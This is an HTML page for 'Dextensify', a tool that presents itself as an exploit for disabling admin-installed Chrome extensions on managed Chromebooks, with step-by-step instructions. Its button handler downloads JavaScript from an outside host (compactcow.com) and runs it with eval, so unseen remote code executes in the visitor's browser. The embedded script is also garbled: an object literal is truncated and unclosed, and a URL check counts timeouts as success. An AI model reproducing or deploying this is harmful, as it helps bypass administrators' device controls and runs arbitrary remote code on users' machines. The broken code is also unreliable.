<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <title>Dextensify</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <style>
      * {
        font-family: Sans-serif;
        color: #d4d3da;
      }
      a {
        color: #6daebd;
      }
      a:hover {
        color: #4f9eb0;
      }      
      pre, code {
        font-family: monospace;
        background-color: #1e2324;
        padding: 4px;
        overflow-x: auto;
      }
      pre {
        padding: 8px;
      }
      pre code {
        background-color: transparent;
        border: none;
        padding: 0px;
      }
      body {
        background-color: #1e2324;
        width: 100%;
        height: 100%;
        margin: 0px;
      }
      button {
        background-color: #33626c;
        padding: 6px;
        padding-left: 8px;
        padding-right: 8px;
        border: transparent;
        font-size: 15px;
      }
      #main_div {
        max-width: 800px;
        object-fit: contain;

        background-color: #252b2d;

        padding: 4px;
        padding-left: 16px;
        padding-right: 16px;
        
        margin: 16px;
        margin-left: auto;
        margin-right: auto;
      }
      #buttons_container {
        display: flex;
        flex-wrap: wrap;
        gap: 8px;
      }
    </style>
    <script>
      let from_id = id => document.getElementById(id);
      let extensions = {
        "chrome web store": {
          name: "web store",
          url: "https://chrome.google.com/webstorex"
        
        
      async function check_url(url) {
          let controller = new AbortController();
          let timeout = setTimeout(() => controller.abort(), 500);

          try {
            let response = await fetch(url, { signal: controller.signal });
            return response.ok; // Check both accessibility and successful response
            } catch (error) {
              return error.name === "AbortError"; // Only return true for AbortError
          }
      }

      
      async function detect_extensions() {
        let detected = [];
        for (let extension of Object.values(extensions)) {
          let exists = await check_url(extension.url);
          if (exists) {
            detected.push(extension);
          }
        }
        return detected;
      }

      async function main() {
        let detected = await detect_extensions();
        let buttons_container = from_id("buttons_container")


        if (detected.length === 0) {
          buttons_container.innerHTML = `<p><b>Error: No supported extensions detected.</b></p>`;
          buttons_container.innerHTML += `<p style="margin-top: -16px;">If you want support for a specific extension added, please make an issue on the <a href="https://github.com/ading2210/dextensify">Github repository</a>, and provide the extension ID and manifest.</p>`;
          return;
        }
        else {
          buttons_container.innerHTML = ""
        }

        for (let extension of detected) {
          let button = document.createElement("button");
          button.innerText = `Freeze ${extension.name}`;
          button.onclick = () => {
            button_handler(extension);
          }
          buttons_container.append(button);
        }
      }

      
        
      function button_handler(extension) {
        let cancel = !confirm("After hitting OK, there will be a 5 second delay until the extension starts being frozen. Switch to another tab immediately to prevent the entire device from locking up.");
        if (cancel) return;
        
        setTimeout(() => {
          create_iframes(extension);
        }, 5000);
      }

      function create_iframes(extension) { 
    fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
      }
        
      window.onload = main;
    </script>
  </head>
  <body data-new-gr-c-s-check-loaded="8.908.0" data-gr-ext-installed="">
    <div id="main_div">
      <h1 style="margin-top: 8px">Dextensify</h1>
      <p>Dextensify is an exploit which lets you disable most admin-installed Chrome extensions from any webpage.</p>
      <h2>Instructions</h2>
      <ol>
        <li>Open chrome://extensions in a new tab. Keep this page open.</li>
        <li>Go to the settings page for the extension you want to disable.</li>
        <li>On the Dextensify page, click the "freeze extension" button. Immediately switch back to the chrome://extensions tab.</li>
        <li>Back on the chrome://extensions page, spam the "allow access to file URLs" switch (or any other switch) for a few seconds.</li>
        <li>The extension should now be temporarily disabled. For this 
effect to persist, flip the "allow access to file URLs" again every few 
minutes, or if pages start getting blocked again.</li>
        <li>You may also need to reopen this page every once in a while to prevent an unavoidable memory leak from crashing the system.</li>
      </ol>
      <p>During this process, your Chromebook may hang momentarily. This is normal, and it should resolve itself after a few seconds.</p>
      <div id="buttons_container"><p><b>Error: You are not running a Chromium-based browser.</b></p></div>
      <br>
      <hr>
      <details>
        <pre>
Copyright (c) 2023 ading2210.
Copyright (c) 2024 sunbeamed
</pre>
        <p style="font-size: 13px; text-align: right;"><i>Version 1.1.1</i></p>
      </details>
    </div>
  

</body><grammarly-desktop-integration data-grammarly-shadow-root="true"></grammarly-desktop-integration></html>
